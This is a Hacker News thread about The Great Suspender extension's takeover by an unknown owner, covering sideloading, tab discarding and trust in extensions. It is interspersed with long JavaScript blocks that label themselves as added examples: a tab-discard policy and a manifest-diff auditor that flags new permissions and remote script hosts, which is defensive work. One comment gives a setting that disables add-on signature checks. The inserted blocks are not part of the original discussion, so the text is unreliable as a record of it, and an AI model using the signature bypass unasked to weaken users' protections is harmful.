| Bayart wrote: | You should be able to do some of that at the debug console | level. But otherwise you're stuck tracking traffic at page | level, at least as far as I know. | zerd wrote: | My wife installed an addon to be able to post Instagram posts | from her laptop, and then suddenly clicking on google search | results would sometimes, but not always hijack and redirect to | bing, and then click on one of the ads. But it was clever | because it only happened sometimes, and if she retried it it | didn't happen, so whenever she would try to show me, it didn't | happen. I just removed all her addons and the problem went away, | so not sure which one it was. | ufmace wrote: | It's things like this that make me a lot more reluctant to | install extensions that might be moderately convenient. Maybe | they're okay now, but it's too much of a burden to keep track | of what I have installed and which ones are known to be doing | something nasty. | | Another loser in this whole game is the honest hobby extension | developers, who have to deal with the power-users who might | promote their extensions not wanting to bother for fear of not | being able to keep a watch for potential malicious updates for | all of them. | AlphaWeaver wrote: | Quick note about the workaround mentioned in this article - the | suggestion to download the last known good version of the | extension and sideload it is a good one, but it has some problems | on Chrome. | | Chrome has features to dissuade users from installing extensions | from outside the Chrome Web Store. If you load an unpacked | extension, Chrome will issue an ominous warning (something like | "this extension is untrusted, click here to uninstall") on every | launch. | | One could argue this is for security, but this change was | implemented around the same time that Google disabled the ability | to self-host extensions that install into Chrome. 
Really this is | a mechanism to shut out independent extension developers from any | potential plausible third-party distribution method that doesn't | rely on the Chrome Web Store (which Google controls and | aggressively moderates.) | | Use Firefox. | nousermane wrote: | > Chrome will issue an ominous warning on every launch. | | That's google's shtick. They do the same if you unlock | bootloader on your android phone. Black nag screen with scary | text on every reboot. | tyingq wrote: | You could download it and publish it yourself. I have an | extension I wrote myself, and while I occasionally see | something about having to pay $5 in the extension management | panel, it never forces me to do so. If they closed that hole, | perhaps it's worth the $5 developer registration fee to some. | AlphaWeaver wrote: | When did you publish your extension? I'm an extension | developer that makes a mildly popular extension used by a | niche group (1-2k MAU) and the Chrome Web Store has tightened | their policies over the years. It's possible that you're | grandfathered in (and haven't hit any of the extra reporting | requirements if you haven't updated your extension recently.) | | Extensions these days go through a rigorous review process, | and Google regularly shuts down / imposes arbitrary | restrictions against extensions due to changing policies. | | I understand the importance of strong moderation to protect | users from malicious extensions, but I believe Google is | using that as an excuse to further _lock down_ their store, | increasing barriers to entry and making it harder for | developers to build software to extend the most popular | browser in the world without Google's blessing. | tyingq wrote: | I hadn't looked at it for a while, so I just did so. | | You're right...it won't let me update it now without a lot | of justifications on their privacy tab. However, it is | still published. 
The status is "Status: Published - | unlisted", so I can't search for it, but I can go direct to | the store url for it. | AlphaWeaver wrote: | Yeah, that matches up with what I've seen. They've at | least been decent enough not to kick people off the | store, but I don't think it's possible to just have them | sign / publish something unlisted these days without a | good deal of policy writing and justifications. | | Yet the large actors still publish malicious updates to | extensions. ¯\_(ツ)_/¯ | tyingq wrote: | They have this "private" feature now where you have to | list the email addresses of people that are allowed to | use the extension. I don't see why that couldn't be | coupled with "no review required", so long as the list is | relatively short. But, yeah, likely will never happen. | | Fortunately for me, I can re-do my extension to use the | JS postMessage api which won't require hardly any | permissions, and thus, not much to review. | kobalsky wrote: | > Chrome has features to dissuade users from installing | extensions from outside the Chrome Web Store. If you load an | unpacked extension, Chrome will issue an ominous warning | (something like "this extension is untrusted, click here to | uninstall") on every launch. | | I've been sideloading vimium and thegreatsuspender for years | and I haven't seen this message ever. Not on Mac nor Linux. | squaresmile wrote: | I'm pretty sure if you enable Extension Developer Mode, you | won't get that nagging message on launch. | gcatalfamo wrote: | There is another problem by sideloading the extension: you | don't have cloud sync anymore, thus forcing you to sideload on | every computer you have. | [deleted] | TedDoesntTalk wrote: | > Use Firefox. | | Firefox has similar restrictions... you have to side load | through Developer Options. 
If you're not a developer, you will | be questioning why you're doing this and the less-technically | inclined will simply never do it (like my wife) | | And it is not entirely nefarious as you suggest. It limits the | damage that sideloaded extensions did roughly 2010 and earlier. | The WebExtension API was another assault on extensions. These | days, chrome and Firefox have essentially closed a huge attack | vector even though extensions are a shadow of their former | selves. I was a skeptic for a long time (why should power users | pay for the faults of everyone else?) but no more. Kudos. | kibwen wrote: | _> you have to side load through Developer Options_ | | I'm not sure what screen "Developer Options" is referring to, | but you can load add-ons directly from your hard drive with | no fuss from the Add-ons page (though you must be running the | Nightly or Developer version of Firefox). Click the gear icon | right above your list of installed add-ons (this is also the | menu that lets you disable auto-updates). | driverdan wrote: | Installing extensions from a file is supported in the | latest mainline FF (84.0.2), nightly or dev are not | required. I currently have one installed. It just shows a | confirmation dialog and then installs it. | bovine3dom wrote: | This is true but misleading: the extension you install | from file has to be signed by Mozilla in exactly the same | way that extensions on the store are signed. | Arnavion wrote: | You can remove the signature requirement on stable by | setting `xpinstall.signatures.required` to `false` in | your user.js / about:config | | (I wrote most of the extensions I installed for my own | bespoke use, built locally as zip files and installed via | "Install Add-on From File...", and I don't have a problem | trusting myself.) | bovine3dom wrote: | I don't think this is true for the official Mozilla | builds (except for Nightly, Beta and unbranded). 
It's | possible that your distro has a custom build that allows | the setting. Arch builds Firefox with `--allow-addon- | sideload` which could be the culprit. | Arnavion wrote: | Ah indeed. My distro also builds with `--allow-addon- | sideload` | bovine3dom wrote: | No promises that that's actually the right flag. I had a | rummage around searchfox and it looks like that just | enables extensions that have been placed in special | directories (whether they must be signed or not is a | different flag). There clearly is a setting somewhere | though as the unbranded builds exist... | jannes wrote: | So you have to use an experimental version of Firefox. | These nightly versions are less tested and can be a serious | downgrade from any stable browser. | | That's hardly what "Use Firefox" implied. | Semaphor wrote: | The Developer Edition is not a nightly build, it's a beta | build, so there has been some testing (Before I switched | to stable, I only once had an issue). Your point stands | though. | bovine3dom wrote: | You can use unbranded builds which are pretty much | identical to the stable releases but let you use unsigned | extensions. | | https://wiki.mozilla.org/Add- | ons/Extension_Signing#Unbranded... | kibwen wrote: | I can see why you'd think that but in practice I assure | you that your concern is unwarranted. I've been using | Nightly Firefox exclusively for almost ten years and I | honestly can't remember it ever crashing (excluding the | times when I was manually futzing with experimental | about:config flags back in the electrolysis days). | | As for the developer edition, it's literally the version | that they expect web developers to use; it's not half- | baked software by any means. | kchr wrote: | "Stable" doesn't necessarily mean that it is secure, from | an end-user perspective. 
| AlphaWeaver wrote: | Chrome sideloads extensions through a similarly obscure menu | - My main quarrel is the prompt where the _default option is | to uninstall_ that appears on every launch. Firefox doesn't | have that. | | Firefox also permits self-hosting extensions signed through | their store, providing more freedom for extension developers. | asddubs wrote: | yeah i kind of hate it but i can't really blame them for | doing it, since before they did that, if you installed | software from questionable sources like, say, java from the | oracle website, it would bundle an ask toolbar with it. and | this was so common | Karunamon wrote: | _Kudos?_ | | Availability is part of security, and the most secure system | is disconnected from the internet and powered off. Why are we | cheering our software becoming _less_ useful in the name of | safety? The switch to WebExtensions was a monstrous loss of | functionality! | [deleted] | albertgoeswoof wrote: | Or you can use https://www.one-tab.com/ or https://tab.bz for a | similar-ish use case | TheRealPomax wrote: | Is there a reason this extension still exists, given that tabs | get heavily deprioritized when not in focus, and have been for | many, many versions now? | spiffytech wrote: | Chrome throttles tab CPU activities when backgrounded, but | doesn't clear memory for the tab. For users like me who usually | have 50-800 tabs open across all my browser windows, that | _really_ adds up. I also appreciate (err... appreciated) The | Great Suspender because I didn't want _all_ of those tabs | active _every_ time I opened a browser, so I'd have scores of | tabs that never even got loaded, but were ready to go the | moment I wanted to return to them. | shawnz wrote: | Chrome does discard the memory of tabs that haven't been used | recently and Great Suspender can be configured to make use of | that functionality. | dbbk wrote: | They get throttled but still kept in memory. This drops them | from memory. 
| alyandon wrote: | The MS Edge dev channel has a basic form of tab suspending built | into it now. Based on my non-rigorous testing it seems to | actually save more memory than TGS ever did so I just removed the | extension entirely. | | It is really a shame that basic functionality like this isn't | built into more browsers and we have to rely on extensions to | fill the gaps just to keep memory usage under control for tab-a- | holics like myself. :( | davidfstr wrote: | > It is really a shame that basic functionality like this isn't | built into more browsers and we have to rely on extensions to | fill the gaps just to keep memory usage under control for tab- | a-holics like myself. :( | | The way I see it, extension developers get to come up with | innovative new features first, and then the first-party vendors | like Apple, Google, and Microsoft take note and eventually do | just that: Integrate it into their own products. | | For example: The Great Suspender - Sleeping Tabs [experimental] | (Microsoft/Edge); Flux - Night Shift (Apple/iOS); Growl - macOS | Notifications (Apple/macOS); Swype - iOS Built-in Keyboard | (Apple/iOS); etc | | Edit: Fix formatting. | shawnz wrote: | In fact tab suspending/discarding has been built into Chrome | for some time now and Great Suspender does optionally make use | of the built-in functionality. | | I still sometimes use extensions like Great Suspender to give | more control over the process (e.g. to suspend more | aggressively on RAM-constrained machines or where the user uses | a lot of tabs). | | Since this news came out I have switched to "Auto Tab Discard". | jannes wrote: | Chromium-based browsers and Firefox have discarding built-in. | | chrome://discards/ has some advanced options (in Chromium-based | browsers). | | Funnily enough, Google mentions The Great Suspender as | inspiration for this feature in the August 2015 changelog: | https://developers.google.com/web/updates/2015/09/tab-discar... 
| | > We actually had a great chat with the author of the Great | Suspender extension while developing tab discarding and they're | glad to see us natively tackling this problem in ways that are | more efficient than an extension might be able to, such as | losing the state of your user inactions. | dbbk wrote: | The functionality is built-into Chrome, the native tab | discarding just happens when it thinks memory pressure is too | high. Extensions like this give you extra granularity to set it | to happen after a timer. | MacroChip wrote: | Does this extension add functionality beyond Chrome's existing | tab suspension? | jeromeparadis wrote: | There's a reason why I don't install any extension except a | password manager. | otterpro wrote: | Wow, this is why just recently my Macbook pro was registering | high CPU usage even when all tabs were asleep using Great | Suspender. For some reason, Chrome was registering high CPU | usage, and I thought it was some Chrome bug. | michaelcampbell wrote: | You lost me. What's this "this" in "this is why", exactly? | angryasian wrote: | there really needs to be a better bookmarking solution. | asadkn wrote: | I have always used The Great Discarder instead [1] | | It's by the same dev too but it uses Chrome's Native Tab | Discarding feature and I found it way more efficient (at the time | I started using it a few years ago - haven't compared recently). | | [1] https://chrome.google.com/webstore/detail/the-great- | discarde... | monkpit wrote: | I like the idea of using the discard mechanism, but if it's | from the same developer, wouldn't it be at risk of having the | same thing happen? | asadkn wrote: | True that's possible if it were to get popular. But since | this wasn't the popular extension, it'd seem it wasn't sold | off. | shawnz wrote: | Great Suspender eventually added functionality to use Chrome's | native tab discarding as well and so they stopped updating | Great Discarder. 
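Several comments above (shawnz, jannes, dbbk) point out that Chromium already exposes native tab discarding and that an extension only needs to add the timer policy on top. The following is an added example, not code from the thread, from The Great Suspender, The Great Discarder or Auto Tab Discard: the core of a minimal "discard idle tabs" extension built on `chrome.tabs.discard()`, written so the selection policy is a pure function that runs under plain Node.js while `wireToChrome()` binds it to the real API only when a `chrome` object is present. The manifest shape (MV3, service worker) and the idle threshold are assumptions; the point of the manifest is the permission set, `tabs` and `alarms` only, with no host permissions, so an extension like this cannot read or change page content no matter who owns it later.

```javascript
// Added example: idle-tab discarding on top of Chrome's native API with the
// least privilege needed. Not the code of any extension named in the thread.

// Assumed MV3 manifest for this background script. No "<all_urls>", no
// host_permissions, no content scripts: the extension can see tab metadata
// and discard tabs, nothing more.
const MANIFEST = {
  manifest_version: 3,
  name: 'Tiny Native Discarder (example)',
  version: '0.1',
  permissions: ['tabs', 'alarms'],
  background: { service_worker: 'background.js' },
};

const IDLE_MINUTES = 30;              // assumed default; make it an option in a real build
const SWEEP_PERIOD_MINUTES = 1;       // chrome.alarms minimum in released builds

// Pure policy: which of `tabs` (chrome.tabs.Tab-like objects) should be
// discarded, given a Map of tabId -> last activation time (ms) and `now`.
// A tab the policy has never seen is stamped with `now` and skipped, so it
// gets a full idle window before it is eligible.
function selectTabsToDiscard(tabs, lastActive, now, idleMs = IDLE_MINUTES * 60 * 1000) {
  const chosen = [];
  for (const t of tabs) {
    if (t.active) continue;                      // the tab the user is looking at
    if (t.discarded) continue;                   // already suspended by Chrome
    if (t.autoDiscardable === false) continue;   // page or user opted out (chrome://discards)
    if (t.audible) continue;                     // playing audio; the TGS behaviour people missed
    if (t.pinned) continue;
    const seen = lastActive.get(t.id);
    if (seen === undefined) { lastActive.set(t.id, now); continue; }
    if (now - seen >= idleMs) chosen.push(t);
  }
  return chosen;
}

// Bind the policy to the real extension API. Returns false outside a browser.
function wireToChrome(api = globalThis.chrome) {
  if (!api || !api.tabs || !api.alarms) return false;
  const lastActive = new Map();
  api.tabs.onActivated.addListener(({ tabId }) => lastActive.set(tabId, Date.now()));
  api.tabs.onRemoved.addListener(tabId => lastActive.delete(tabId));
  api.alarms.create('sweep', { periodInMinutes: SWEEP_PERIOD_MINUTES });
  api.alarms.onAlarm.addListener(async alarm => {
    if (alarm.name !== 'sweep') return;
    const tabs = await api.tabs.query({});
    for (const t of selectTabsToDiscard(tabs, lastActive, Date.now())) {
      try { await api.tabs.discard(t.id); } catch (e) { /* tab closed mid-sweep */ }
    }
  });
  return true;
}

// Constructed sample state so the policy can be exercised without a browser.
function demo() {
  const now = 10_000_000;
  const stale = now - 45 * 60 * 1000;   // idle 45 min: eligible
  const fresh = now - 5 * 60 * 1000;    // idle 5 min: keep
  const tabs = [
    { id: 1, active: true,  discarded: false, audible: false, pinned: false, autoDiscardable: true },
    { id: 2, active: false, discarded: false, audible: false, pinned: false, autoDiscardable: true },
    { id: 3, active: false, discarded: false, audible: true,  pinned: false, autoDiscardable: true },
    { id: 4, active: false, discarded: false, audible: false, pinned: false, autoDiscardable: true },
    { id: 5, active: false, discarded: true,  audible: false, pinned: false, autoDiscardable: true },
    { id: 6, active: false, discarded: false, audible: false, pinned: false, autoDiscardable: false },
    { id: 7, active: false, discarded: false, audible: false, pinned: false, autoDiscardable: true },
  ];
  const lastActive = new Map([[1, fresh], [2, stale], [3, stale], [4, fresh], [5, stale], [6, stale]]);
  return selectTabsToDiscard(tabs, lastActive, now).map(t => t.id);   // tab 7 is unseen: skipped
}

wireToChrome();   // no-op under Node, live inside the extension
```

Of the seven constructed tabs only tab 2 is discarded: tab 1 is active, 3 is audible, 4 was used recently, 5 is already discarded, 6 opted out, and 7 has never been seen so it is stamped and given a full idle window. Because the browser does the actual discarding, form state and scroll position are preserved on reload (the "slight advantage" shawnz mentions), and the extension never touches page content.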
| pjmlp wrote: | I just don't use extensions, so no need to worry about such | scenarios. | StellarTabi wrote: | The lack of user control, lock files, granularity of controls | over browser extensions has gone too far. | Aardwolf wrote: | Doesn't chrome already suspend background tabs without plugin? At | least I'm unable to properly have browser games running unless | they're in a visible tab. | rolfvandekrol wrote: | Browser games, implemented in Javascript, usually depend on | requestAnimationFrame, which is not executed in background | tabs. See https://developer.mozilla.org/en- | US/docs/Web/API/window/requ... for more info. | mtoddsmith wrote: | Seems there should be an extension which checks other extensions | for nefarious activity or notifies you of the events that are | mentioned in the article. | dr-detroit wrote: | You've heard of first world problems this is Martian problems | like seriously you cant manage chrome tabs yourself | istorical wrote: | anyone able to compare Tiny Suspender and Auto Tab Discard? | qwerty456127 wrote: | By the way, is there an extension (I'm interested in both Firefox | and Chrome) which would force all the new (background) tabs to be | created in the suspended state (like if you had opened them in | background and then restarted the browser) and only start loading | after you actually open them? | kchr wrote: | Same here! | gneray wrote: | Ditto | vmception wrote: | Uninstalled and reported. | orliesaurus wrote: | Lifehack: export your suspended tabs as a flat file through the | interface, uninstall the add on, then follow the downgrade as the | blog suggests, at the end reimport your tabs from the flat file | AQXt wrote: | > Apparently recent versions of this extension have been taken | over by a shady anonymous entity... | | That's something that worries me, whenever I install a software | with trusted privileges. | | Software companies can sell their products -- and user base -- to | other companies without notice. 
| | And it can be even worse in the free software world: think about | all the updates that happen when you type `apt- | get|yum|brew|npm|pip update`. What are the odds of a single | dependency being taken over by a shady anonymous entity? | [deleted] | acdha wrote: | This is why I stopped using extensions in any browser years ago | unless it came from a trusted company I pay directly (i.e. | 1Password). The broken economic model means that the developers | always have pressure to cash in on a popular extension and Google | has set things up to make abuse fast and easy with automatic | silent updates and their usual skimping on human review. By the | time the news about TGS came out most users already had the next | release installed. | jeffbee wrote: | Indeed. There was never a basis for trusting The Great | Suspender in the first place. "Read and change all your data" | is a permission that should be reserved for code you wrote | yourself. | Centigonal wrote: | More discussion on GitHub: | https://github.com/greatsuspender/thegreatsuspender/issues/1... | | Quite similar to what happened to Nano Adblocker/Defender a few | months ago. | [deleted] | gruez wrote: | previous discussion: | https://news.ycombinator.com/item?id=25622015 | [deleted] | jancsika wrote: | > Disable analytics tracking by opening the extension options for | The Great Suspender and checking the box "Automatic deactivation | of any kind of tracking". | | > Pray that the shady developer doesn't issue a malicious update | to The Great Suspender later. (There's no sensible way to disable | updates of an individual extension.) | | Does Debian ship packages for individual browser extensions? | | I mean, if they do I'm sure it's not scalable and-- after | spending time reading debuild manual-- a giant, archaic pain in | the ass. | | On the other hand, all these app delivery systems are so damned | pernicious and require constant vigilance. 
| We may have arrived at a moment in time where this is actually a difficult decision:
|
| * pay somebody a living wage to burrow down into Debian's WoT bureaucracy and add at least a selection of this functionality _without_ phoning home
|
| * continue playing the most tedious game of whack-a-mole with a whack-a-mole game that mines all our data in order to learn how best to beat all users at whack-a-mole
| [deleted]
| vaduz wrote:
| > Does Debian ship packages for individual browser extensions?
|
| They do, for a couple of the more notable ones (HTTPS Everywhere, uBlock Origin, Proxy Switcher, etc.) [0]
|
| > I mean, if they do I'm sure it's not scalable and-- after spending time reading debuild manual-- a giant, archaic pain in the ass.
|
| The biggest problem is to find a person to be a maintainer that is willing to keep up with the upstream development.
|
| [0] https://packages.debian.org/search?keywords=webext-&searchon...
| wintermutestwin wrote:
| At this point, I would gladly pay good money for a browser that prevented ads and tracking, provided most of the standard plugin functionality out of the box, and vetted the rest. This whole mess is a massive time suck.
| [deleted]
| abecedarius wrote:
| I'm using Brave. Not sure it exactly matches what you want, but it's the closest I've found.
| skrowl wrote:
| Just sent him this email:
|
| Saw your article via HN.
|
| As an easier permanent fix, just uninstall The Great Suspender and install Auto Tab Discard (https://add0n.com/tab-discard.html). It does the same thing.
|
| It's available on:
|
| Firefox - Auto Tab Discard - Get this Extension for Firefox (en-US) (https://addons.mozilla.org/en-US/firefox/addon/auto-tab-disc...)
|
| Edge - Auto Tab Discard - Microsoft Edge Addons (https://microsoftedge.microsoft.com/addons/detail/auto-tab-d...)
|
| or even if you're still using Chrome - Auto Tab Discard - Chrome Web Store (https://chrome.google.com/webstore/detail/auto-tab-discard/j...)
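The permission jeffbee names above ("Read and change all your data") and mtoddsmith's wish for something that checks other extensions both come down to reading manifest.json, which is what the Chrome Web Store's silent update replaces. The Node script below is an added example, not code from the post, from The Great Suspender or from any extension named in this thread: it diffs two versions of one extension's manifest and reports what the upgrade newly asks for. The two manifests are constructed samples for a hypothetical extension, the list of host patterns that trigger Chrome's all-sites warning is my assumption about which forms that warning covers, and the CSP handling assumes the Manifest V2 string form and the Manifest V3 extension_pages form.

```javascript
// Added example, not from the post or from any extension named in the thread:
// diff two versions of an extension's manifest.json and report what the
// upgrade newly asks for. Both manifests below are constructed samples.

// Host patterns that Chrome surfaces as "Read and change all your data on all
// websites" (assumed list covering the common forms of an all-sites grant).
const ALL_SITES = ["<all_urls>", "*://*/*", "http://*/*", "https://*/*"];

function isHostPattern(p) {
  return p === "<all_urls>" || /^(\*|https?|file|ftp):\/\//.test(p);
}

// Every host pattern a manifest claims: MV2 "permissions" host entries,
// MV3 "host_permissions", and the match patterns of its content scripts
// (a content script injected on every site is as good as reading every site).
function hostPatterns(m) {
  const out = new Set((m.permissions || []).filter(isHostPattern));
  for (const p of m.host_permissions || []) out.add(p);
  for (const cs of m.content_scripts || []) for (const p of cs.matches || []) out.add(p);
  return out;
}

// API permissions are the non-host entries of "permissions".
function apiPermissions(m) {
  return new Set((m.permissions || []).filter((p) => !isHostPattern(p)));
}

// Remote origins allowed to serve script into the extension's own pages.
// MV2 keeps the CSP as a string; MV3 nests it under extension_pages.
function remoteScriptSources(m) {
  const csp = typeof m.content_security_policy === "string"
    ? m.content_security_policy
    : (m.content_security_policy || {}).extension_pages || "";
  const directive = csp.split(";").map((d) => d.trim()).find((d) => d.startsWith("script-src"));
  if (!directive) return [];
  return directive.split(/\s+/).slice(1).filter((src) => !src.startsWith("'"));
}

const grantsAllSites = (hosts) => ALL_SITES.some((p) => hosts.has(p));
const added = (before, after) => [...after].filter((x) => !before.has(x)).sort();

// The audit itself: everything the new version has that the old one did not.
function auditUpgrade(oldM, newM) {
  const oldHosts = hostPatterns(oldM), newHosts = hostPatterns(newM);
  return {
    version: `${oldM.version} -> ${newM.version}`,
    addedPermissions: added(apiPermissions(oldM), apiPermissions(newM)),
    addedHosts: added(oldHosts, newHosts),
    allSites: { before: grantsAllSites(oldHosts), after: grantsAllSites(newHosts) },
    addedRemoteScripts: added(new Set(remoteScriptSources(oldM)), new Set(remoteScriptSources(newM))),
  };
}

// Turn the audit into the lines a user would actually want to read.
function findings(a) {
  const out = [];
  if (a.allSites.after) out.push(`${a.allSites.before ? "still" : "NOW"} reads and changes data on all sites`);
  if (a.addedPermissions.length) out.push(`new API permissions: ${a.addedPermissions.join(", ")}`);
  if (a.addedHosts.length) out.push(`new host access: ${a.addedHosts.join(", ")}`);
  if (a.addedRemoteScripts.length) out.push(`new remote script sources: ${a.addedRemoteScripts.join(", ")}`);
  return out;
}

// Constructed sample manifests for a hypothetical tab-suspending extension
// (these are not The Great Suspender's manifests).
const OLD_MANIFEST = {
  manifest_version: 2, name: "Sample Suspender", version: "7.1.6",
  permissions: ["tabs", "storage"],
  content_scripts: [{ matches: ["<all_urls>"], js: ["content.js"] }],
  content_security_policy: "script-src 'self'; object-src 'self'",
};
const NEW_MANIFEST = {
  manifest_version: 2, name: "Sample Suspender", version: "7.1.8",
  permissions: ["tabs", "storage", "webRequest", "webRequestBlocking", "https://analytics.example/*"],
  content_scripts: [{ matches: ["<all_urls>"], js: ["content.js"] }],
  content_security_policy: "script-src 'self' https://analytics.example; object-src 'self'",
};

const SAMPLE_AUDIT = auditUpgrade(OLD_MANIFEST, NEW_MANIFEST);
for (const line of findings(SAMPLE_AUDIT)) console.log(`${SAMPLE_AUDIT.version}: ${line}`);
```

On the constructed sample the report says the extension already read all sites before the upgrade, which is jeffbee's point: the interesting findings are the new webRequest permissions and the new remote script origin, which is exactly the kind of change a silent update slips past a user who accepted the original permission prompt. To run it on a real upgrade, JSON.parse the two manifests from the browser profile's Extensions directory, where Chrome keeps one subdirectory per extension id and installed version (on Linux I have seen this under ~/.config/google-chrome/Default/Extensions/<id>/<version>_0/manifest.json; treat that layout as an assumption, not something the thread states).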
| jschuur wrote:
| Discarding inactive tabs is not what I use The Great Suspender for. I use it to... suspend tabs. Auto Tab Discard doesn't seem to do that.
| shawnz wrote:
| Discarding the tab is superior to what Great Suspender used to do. Why would you want the old behaviour?
|
| Tab discarding is just a more efficient, native implementation of what Great Suspender aimed to do in the first place.
| Arnavion wrote:
| I don't use Chrome, so I have no idea what either of these extensions did, but FF's implementation of tab discarding causes it to reload the page when I switch to the tab, which means I have to wait for the page to load before I can do whatever I wanted to do.
|
| I'd much rather have a way to just stop all JS on a "suspended" tab so that FF doesn't burn 20% CPU on tabs that aren't even visible. (Yes, I'm aware that JS timers, etc. operate at reduced frequency for unfocused tabs. I'm talking about stopping them entirely.) Discarding may be more efficient for the browser, but it's less efficient for me, the user, so I don't use it.
| shawnz wrote:
| Fair enough, although that is not what Great Suspender did. Great Suspender also causes the page to be reloaded on resumption, just like an early version of tab discarding.
|
| Tab discarding does have the slight advantage that it remembers what you typed in on the page and where you were scrolled (but nonetheless still causes a reload).
|
| What you are asking for regarding slowing the performance of background JS is something browsers already do: https://stackoverflow.com/questions/15871942/how-do-browsers...
|
| Making that behaviour more aggressive seems like it is liable to cause significant problems to the user experience with minimal benefits. E.g. background media playback would likely be broken, notifications, etc.
| Whereas you could simply use bookmarks instead of open tabs to get the same effect.
| Arnavion wrote:
| > What you are asking for regarding slowing the performance of background JS is something browsers already do
|
| As I wrote:
|
| >> (Yes I'm aware that JS timers, etc operate at reduced frequency for unfocused tabs. I'm talking about stopping them entirely.)
|
| > Making that behaviour more aggressive seems like it is liable to cause significant problems to the user experience with minimal benefits. E.g. background media playback would likely be broken, notifications, etc.
|
| I want none of those things from the "suspended" tabs.
|
| > Whereas you could simply use bookmarks instead of open tabs to get the same effect
|
| How? Do you mean I would load the bookmark into a new tab when I wanted to visit it? That not only has the same problem that I described for discarded tabs (having to wait for a page load), but is even worse because it loses all the context that discarded tabs do retain. Not to mention the annoyance of maintaining bookmarks for arbitrary tab groups that I just happen to have open.
| [deleted]
| [deleted]
| loceng wrote:
| Ah damn, I was about to try it to see if it actually discarded or suspended tabs.
| fudged71 wrote:
| What is the difference?
|
| From the website, it sounds like the favicon is changed. So the tab doesn't go away; it's just on pause.
|
| Google: "a discarded tab doesn't go anywhere. We kill it but it's still visible on the Chrome tab strip. If you navigate back to a tab that's been discarded, it'll reload when clicked. Form content, scroll position and so on are saved and restored the same way they would be during forward/backward tab navigation."
|
| In the future this will be updated to also use a serializer for discarded tabs.
| kchr wrote:
| Discard doesn't mean "remove" in this context. It will unload the tab, but still keep the state for when you switch back to it. E.g.
| suspend it.
| nguyenkien wrote:
| Edge (dev) has built-in sleep tabs. It works quite well.
| michaelcampbell wrote:
| I wish they had one that would do that based on memory or CPU usage of a tab.
| spiffytech wrote:
| Auto Tab Discard has a setting, "Discard a background tab if its memory usage (totalJSHeapSize) exceeds (in MB)".
| michaelcampbell wrote:
| Greyed out for me in FF. =\
| tyingq wrote:
| I'm now curious how much money the original developer was paid to hand it over. I imagine he/she knew what the buyer's plan was.
| probably_wrong wrote:
| According to the homepage of a company that buys apps, and as a first approximation, that would be "anywhere between 8x - 36x monthly revenue for apps. In most cases this is well above the standard market value of 6-12x".
|
| Whether they are lowballing candidates with that offer, I can't say.
| iamspoilt wrote:
| Uninstalled. Period.
| [deleted]
| jakobpb wrote:
| Uh, just use Firefox. Problem solved for both functionality and security.
| dstick wrote:
| More detailed information can be found here: https://github.com/greatsuspender/thegreatsuspender/issues/1...
___________________________________________________________________
(page generated 2021-01-20 23:00 UTC)
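The discard behaviour the thread describes (the tab stays on the strip, is unloaded, and reloads with form state and scroll position when clicked) is what an extension gets from chrome.tabs.discard(); what the extension itself has to supply is the decision about which background tabs are safe to unload. The block below is an added example, not code from Auto Tab Discard, The Great Suspender or the post, of that decision as a pure function plus the few lines that wire it to the browser. The tab objects are constructed samples shaped like chrome.tabs.Tab (active, pinned, audible, discarded, url); the per-tab last-activation map, the openedAt field, the promise-style chrome.tabs calls (Manifest V3) and the thresholds are this example's own assumptions.

```javascript
// Added example, not code from Auto Tab Discard or The Great Suspender:
// the decision half of an auto-discard extension as a pure function, plus
// the lines that wire it to chrome.tabs.discard(). Tab objects here are
// constructed samples shaped like chrome.tabs.Tab; openedAt and the
// lastSeen map are this example's own bookkeeping (assumption).

const DEFAULTS = { idleMs: 30 * 60 * 1000, keepPinned: true, keepAudible: true };

// Record when a tab was last foregrounded (fed from chrome.tabs.onActivated).
function recordActivation(lastSeen, tabId, now) {
  lastSeen.set(tabId, now);
  return lastSeen;
}

// Which of these tabs should be unloaded right now. Discarding keeps the tab
// on the strip and restores form state and scroll position, but the page does
// reload and any audio stops, so audible and pinned tabs are skipped by default.
function tabsToDiscard(tabs, lastSeen, now, opts = {}) {
  const o = { ...DEFAULTS, ...opts };
  return tabs
    .filter((t) => {
      if (t.active || t.discarded) return false;      // visible, or already unloaded
      if (o.keepPinned && t.pinned) return false;
      if (o.keepAudible && t.audible) return false;
      if (!/^https?:/.test(t.url)) return false;      // leave chrome://, about:, file: alone
      const seen = lastSeen.get(t.id) ?? t.openedAt ?? now;
      return now - seen >= o.idleMs;
    })
    .map((t) => t.id);
}

// Extension wiring (runs only inside an extension; Manifest V3 promise-style
// chrome.tabs API assumed). Returns the interval handle, or null elsewhere.
function startAutoDiscard(lastSeen, opts) {
  if (typeof chrome === "undefined" || !chrome.tabs) return null;
  chrome.tabs.onActivated.addListener(({ tabId }) => recordActivation(lastSeen, tabId, Date.now()));
  return setInterval(async () => {
    const tabs = await chrome.tabs.query({ discarded: false });
    for (const id of tabsToDiscard(tabs, lastSeen, Date.now(), opts)) {
      await chrome.tabs.discard(id);
    }
  }, 60 * 1000);
}

// Page side: after a discard the tab reloads, and Chrome sets
// document.wasDiscarded so a content script can tell a resume from a fresh load.
function resumedFromDiscard(doc) {
  return Boolean(doc && doc.wasDiscarded === true);
}

// Constructed sample: seven tabs, with "now" fixed so the result is reproducible.
const NOW = 1611180000000;
const HOUR = 3600000;
const SAMPLE_TABS = [
  { id: 1, active: true,  pinned: false, audible: false, discarded: false, url: "https://news.ycombinator.com/", openedAt: NOW - 2 * HOUR },
  { id: 2, active: false, pinned: true,  audible: false, discarded: false, url: "https://mail.example/",        openedAt: NOW - 3 * HOUR },
  { id: 3, active: false, pinned: false, audible: true,  discarded: false, url: "https://music.example/",       openedAt: NOW - 3 * HOUR },
  { id: 4, active: false, pinned: false, audible: false, discarded: false, url: "https://docs.example/a",       openedAt: NOW - 3 * HOUR },
  { id: 5, active: false, pinned: false, audible: false, discarded: false, url: "https://docs.example/b",       openedAt: NOW - 5 * 60000 },
  { id: 6, active: false, pinned: false, audible: false, discarded: true,  url: "https://old.example/",         openedAt: NOW - 9 * HOUR },
  { id: 7, active: false, pinned: false, audible: false, discarded: false, url: "chrome://extensions/",         openedAt: NOW - 9 * HOUR },
];
const SAMPLE_LAST_SEEN = recordActivation(new Map(), 4, NOW - HOUR); // tab 4 was foregrounded an hour ago

console.log("would discard:", tabsToDiscard(SAMPLE_TABS, SAMPLE_LAST_SEEN, NOW));
```

On the sample only tab 4 qualifies: tab 1 is visible, 2 is pinned, 3 is playing audio, 5 was opened five minutes ago, 6 is already discarded and 7 is a chrome:// page. Loosening keepAudible and keepPinned adds tabs 2 and 3, which is the trade-off Arnavion and shawnz argue about above: the more aggressively background tabs are unloaded, the more background playback and notifications break. Everything this needs from the browser is the "tabs" permission, not "Read and change all your data".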